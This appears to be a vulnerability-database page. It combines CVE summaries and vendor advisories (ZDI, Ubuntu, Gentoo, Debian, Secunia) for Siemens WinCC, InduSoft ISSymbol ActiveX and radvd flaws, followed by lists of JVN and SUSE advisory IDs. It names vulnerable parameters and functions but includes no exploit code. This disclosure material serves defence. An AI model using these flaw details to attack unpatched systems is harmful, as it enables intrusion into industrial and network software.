var-202407-0441 A vulnerability has been identified in SIMATIC PCS 7 V9.1 (All versions), SIMATIC WinCC Runtime Professional V18 (All versions), SIMATIC WinCC Runtime Professional V19 (All versions < V19 Update 2), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Update 23), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 17), SIMATIC WinCC V8.0 (All versions < V8.0 Update 5). The affected products do not properly handle certain requests to their web application, which may lead to the leak of privileged information. This could allow an unauthenticated remote attacker to retrieve information such as users and passwords. Siemens SIMATIC PCS 7 is a process control system from Siemens, Germany. SIMATIC WinCC is an automated supervisory control and data acquisition (SCADA) system. SIMATIC WinCC Runtime Professional is a visual runtime platform for operators to control and monitor machines and equipment
var-201105-0156 Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-168 : InduSoft Thin Client ISSymbol InternationalSeparator Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-168 August 29, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12446. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-12-19 - Vulnerability reported to vendor 2012-08-29 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUD4cZ1VtgMGTo1scAQJoagf/ZpDTiahOQlERNABRglBe8krgQHhSHddX qVTQjFEyoOL8df5cA/I3JLJxEYRzcT0k8FSdoHUAMDWA8Oxv1BB62r7fgHC1BFjp jbH6u0mL+eYd95jqwfYaruakhABiCRR73nCxYvYGb1Bvx6piBDneD9E+Nx+qycF5 HKb5Fr0wwT+sWssIsnAHx5jDUamdRyQfOR1MAzb6GfKWDsRqwr/T5hWvRLqbZ3Cj VXwmd+MIIAQZIMJ8swKgBvbSeV4tcePun1NhqJYAJtySYR6a6oF112Gk+kXlNXDi EvynyGSXvzLMKEd+vmzSBbVeftCxNQJ8Ce4Vg+LYMGk0YHfoupt3gQ== =Fw26 -----END PGP SIGNATURE-----
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2024-000117 Stack-based buffer overflow vulnerability in multiple laser printers and MFPs which implement Ricoh Web Image Monitor 2024-10-31T16:44+09:00 2025-05-19T17:59+09:00
jvndb-2025-005107 Multiple vulnerabilities in V-SFT 2025-05-16T14:32+09:00 2025-05-16T14:32+09:00
jvndb-2025-005057 Multiple vulnerabilities in I-O DATA network attached hard disk 'HDL-T Series' 2025-05-15T18:27+09:00 2025-05-15T18:27+09:00
jvndb-2025-005050 Multiple vulnerabilities in a-blog cms 2025-05-15T18:11+09:00 2025-05-15T18:11+09:00
jvndb-2025-000031 Pgpool-II vulnerable to authentication bypass by primary weakness 2025-05-15T16:14+09:00 2025-05-15T16:14+09:00
jvndb-2025-004863 Panasonic IR Control Hub vulnerable to Unauthorised firmware loading 2025-05-14T11:30+09:00 2025-05-14T11:30+09:00
jvndb-2025-000030 Reflected cross-site scripting vulnerability in Ricoh laser printers and MFPs which implement Web Image Monitor 2025-05-12T18:00+09:00 2025-05-12T18:00+09:00
jvndb-2025-004671 Multiple vulnerabilities in GL-MT2500 and GL-MT2500A 2025-05-12T17:52+09:00 2025-05-12T17:52+09:00
jvndb-2025-001016 OMRON NJ/NX series vulnerable to path traversal 2025-02-06T18:27+09:00 2025-05-08T17:44+09:00
jvndb-2025-004079 Improper access permission settings in multiple SEIKO EPSON printer drivers for Windows OS 2025-04-30T11:46+09:00 2025-04-30T11:46+09:00
jvndb-2025-004076 Security Update for Trend Micro Trend Vision One (April 2025) 2025-04-30T10:38+09:00 2025-04-30T10:38+09:00
jvndb-2025-000029 Multiple vulnerabilities in Quick Agent 2025-04-25T13:49+09:00 2025-04-25T13:49+09:00
jvndb-2025-000028 i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key 2025-04-24T13:50+09:00 2025-04-24T13:50+09:00
jvndb-2025-000027 Active! mail vulnerable to stack-based buffer overflow 2025-04-18T16:50+09:00 2025-04-18T16:50+09:00
jvndb-2016-000129 Android OS issue where it is affected by the CRIME attack 2016-07-25T11:15+09:00 2025-04-18T16:36+09:00
jvndb-2025-003213 TP-Link Deco BE65 Pro vulnerable to OS command injection 2025-04-11T13:52+09:00 2025-04-11T13:52+09:00
jvndb-2025-000026 Multiple vulnerabilities in BizRobo! 2025-04-10T15:36+09:00 2025-04-10T15:36+09:00
jvndb-2025-003091 Multiple vulnerabilities in Trend Micro Endpoint security products for enterprises (April 2025) 2025-04-09T14:55+09:00 2025-04-09T14:55+09:00
jvndb-2025-002990 Multiple vulnerabilities in Inaba Denki Sangyo Wi-Fi AP UNIT 'AC-WPS-11ac series' 2025-04-07T17:44+09:00 2025-04-07T17:44+09:00
jvndb-2025-002714 Improper symbolic link file handling in FutureNet NXR series, VXR series and WXR series routers 2025-03-31T16:59+09:00 2025-04-03T15:19+09:00
jvndb-2025-000025 WinRAR vulnerable to the symbolic link based "Mark of the Web" check bypass 2025-04-03T12:29+09:00 2025-04-03T12:29+09:00
jvndb-2025-000022 Multiple vulnerabilities in JTEKT ELECTRONICS CORPORATION's products 2025-04-02T15:12+09:00 2025-04-02T15:12+09:00
jvndb-2025-002790 Out-of-bounds Write vulnerabilities in Canon Printer Drivers for Production Printers, Office/Small Office Multifunction Printers and Laser Printers 2025-04-02T15:05+09:00 2025-04-02T15:05+09:00
jvndb-2025-000023 WordPress plugin "Welcart e-Commerce" vulnerable to untrusted data deserialization 2025-04-01T14:20+09:00 2025-04-01T14:20+09:00
jvndb-2024-003016 Multiple vulnerabilities in home gateway HGW BL1500HM 2024-03-25T17:28+09:00 2025-03-28T12:01+09:00
jvndb-2025-000018 Multiple vulnerabilities in home gateway HGW-BL1500HM 2025-03-19T15:33+09:00 2025-03-28T11:48+09:00
jvndb-2025-000024 a-blog cms vulnerable to untrusted data deserialization 2025-03-28T10:46+09:00 2025-03-28T10:46+09:00
jvndb-2025-000021 Multiple vulnerabilities in PowerCMS 2025-03-26T18:13+09:00 2025-03-26T18:13+09:00
jvndb-2025-002592 Multiple vulnerabilities in CHOCO TEI WATCHER mini 2025-03-26T13:25+09:00 2025-03-26T13:25+09:00
jvndb-2025-000019 Multiple vulnerabilities in AssetView 2025-03-25T17:10+09:00 2025-03-25T17:10+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2022-001 TS-2022-001
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
suse-su-2025:02055-1 Security update for gstreamer-plugins-good 2025-06-20T15:35:07Z 2025-06-20T15:35:07Z
suse-su-2025:02053-1 Security update for gstreamer-plugins-good 2025-06-20T13:05:43Z 2025-06-20T13:05:43Z
suse-su-2025:02052-1 Security update for apache2-mod_security2 2025-06-20T13:04:57Z 2025-06-20T13:04:57Z
suse-su-2025:02051-1 Security update for perl 2025-06-20T12:42:29Z 2025-06-20T12:42:29Z
suse-su-2025:02050-1 Security update for python39 2025-06-20T12:41:57Z 2025-06-20T12:41:57Z
suse-su-2025:02049-1 Security update for python311 2025-06-20T12:41:35Z 2025-06-20T12:41:35Z
suse-su-2025:02048-1 Security update for python312 2025-06-20T12:40:39Z 2025-06-20T12:40:39Z
suse-su-2025:02047-1 Security update for python310 2025-06-20T12:40:08Z 2025-06-20T12:40:08Z
suse-su-2025:02046-1 Security update for ignition 2025-06-20T12:33:38Z 2025-06-20T12:33:38Z
suse-su-2025:02045-1 Security update for nodejs20 2025-06-20T11:04:00Z 2025-06-20T11:04:00Z
suse-su-2025:02044-1 Security update for libblockdev 2025-06-20T10:44:00Z 2025-06-20T10:44:00Z
suse-su-2025:02043-1 Security update for libblockdev 2025-06-20T10:41:38Z 2025-06-20T10:41:38Z
suse-su-2025:02042-1 Security update for openssl-3 2025-06-20T10:38:46Z 2025-06-20T10:38:46Z
suse-su-2025:02041-1 Security update for ignition 2025-06-20T10:04:07Z 2025-06-20T10:04:07Z
suse-su-2025:02040-1 Security update for ignition 2025-06-20T09:40:59Z 2025-06-20T09:40:59Z
suse-su-2025:02039-1 Security update for nodejs20 2025-06-20T09:40:53Z 2025-06-20T09:40:53Z
suse-su-2025:02038-1 Security update for python3 2025-06-20T09:40:38Z 2025-06-20T09:40:38Z
suse-su-2025:02037-1 Security update for ghc-pandoc 2025-06-20T09:40:16Z 2025-06-20T09:40:16Z
suse-su-2025:02035-1 Security update for ignition 2025-06-20T09:03:57Z 2025-06-20T09:03:57Z
suse-su-2025:02034-1 Security update for gstreamer 2025-06-20T08:04:51Z 2025-06-20T08:04:51Z
suse-su-2025:02033-1 Security update for webkit2gtk3 2025-06-20T08:04:15Z 2025-06-20T08:04:15Z
suse-su-2025:02032-1 Security update for pam_pkcs11 2025-06-20T07:56:53Z 2025-06-20T07:56:53Z
suse-su-2025:02031-1 Security update for pam_pkcs11 2025-06-20T07:56:26Z 2025-06-20T07:56:26Z
suse-su-2025:02030-1 Security update for xen 2025-06-20T07:04:04Z 2025-06-20T07:04:04Z
suse-su-2025:02029-1 Security update for apache2-mod_security2 2025-06-19T15:17:27Z 2025-06-19T15:17:27Z
suse-su-2025:02028-1 Security update for apache2-mod_security2 2025-06-19T15:16:46Z 2025-06-19T15:16:46Z
suse-su-2025:02027-1 Security update for perl 2025-06-19T15:15:57Z 2025-06-19T15:15:57Z
suse-su-2025:02026-1 Security update for pam_pkcs11 2025-06-19T13:30:55Z 2025-06-19T13:30:55Z
suse-su-2025:02020-1 Security update for gstreamer-plugins-base 2025-06-19T08:35:03Z 2025-06-19T08:35:03Z
suse-su-2025:02019-1 Security update for systemd 2025-06-19T07:58:03Z 2025-06-19T07:58:03Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
opensuse-su-2025:15292-1 radare2-5.9.8-3.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15291-1 erlang-rabbitmq-client-3.13.7-4.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15290-1 python39-3.9.23-3.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15289-1 python314-3.14.0~b3-3.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15288-1 python313-3.13.5-2.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
opensuse-su-2025:15287-1 python312-3.12.11-2.1 on GA media 2025-07-03T00:00:00Z 2025-07-03T00:00:00Z
